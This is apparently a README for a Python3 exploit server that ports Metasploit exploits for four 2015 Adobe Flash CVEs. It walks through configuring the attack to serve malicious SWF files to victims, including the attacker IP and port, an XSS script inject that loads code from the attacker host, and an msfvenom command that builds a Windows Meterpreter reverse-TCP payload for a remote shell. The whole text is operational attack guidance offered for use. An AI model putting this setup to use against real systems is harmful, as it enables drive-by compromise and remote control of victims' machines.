Converted Metasploit exploits for Adobe Flash vulnerabilities CVE-2015-3090, CVE-2015-3105, CVE-2015-5119, and CVE-2015-5122 to a Python3 script.
This script will host a web server that can exploit one of the following Adobe Flash vulnerabilities at a time:
- CVE-2015-3090
- CVE-2015-3105
- CVE-2015-5119
- CVE-2015-5122
You must make changes (outlined here) to exploit.py to suit your needs.
hostname = "192.168.1.100"
- This is an IP on the attacking system that will host the exploit web server.
serverPort = 8080
- This is the port on the attacking system that will host the exploit web server.
xss = False
- If set to
True
, then the victim's first request to the server is treated as JavaScript:- Example XSS Inject:
<script src="http://192.168.1.100:8080/"></script>
- Attack path:
- Victim request 1 -> XSS vulnerable server:
- Victim accesses XSS inject on a remote server that requests a JavaScript file (see request 2).
- Victim request 2 -> JavaScript source on attacking system.
- Victim request 3 -> Malicious swf file.
- Victim request 1 -> XSS vulnerable server:
- Example XSS Inject:
- If set to
False
, then the victim's first request to the server is treated as HTML:- Example:
http://192.168.1.100:8080/
- Attack path:
- Victim request 1 -> HTML file on attacking system.
- Victim request 2 -> Malicious swf file.
- Example:
- If set to
base64Payload = "..."
- This is the base64 payload that will be executed on the victim system.
- Modify the example command below to suit your needs and generate your payload:
- Example:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 | base64
-
Note: The only payload that has worked for me is
windows/meterpreter/reverse_tcp
.
- Example:
swfFile = swfFileList['37368']
- Select the Adobe Flash exploit swf file to use for exploiting the victim system:
-
swfFileList = { '37368': 'CVE-2015-3090.swf', '37448': 'CVE-2015-3105.swf', '37523': 'CVE-2015-5119.swf', '37599': 'CVE-2015-5122.swf' }
-
- Select the Adobe Flash exploit swf file to use for exploiting the victim system:
Run the following command, in the same directory as the malicious swf files, to execute the Adobe Flash exploit script:
python3 exploit.py
CVE-2015-3090 -> https://exploit-db.com/exploits/37368
CVE-2015-3105 -> https://exploit-db.com/exploits/37448
CVE-2015-5119 -> https://exploit-db.com/exploits/37523
CVE-2015-5122 -> https://exploit-db.com/exploits/37599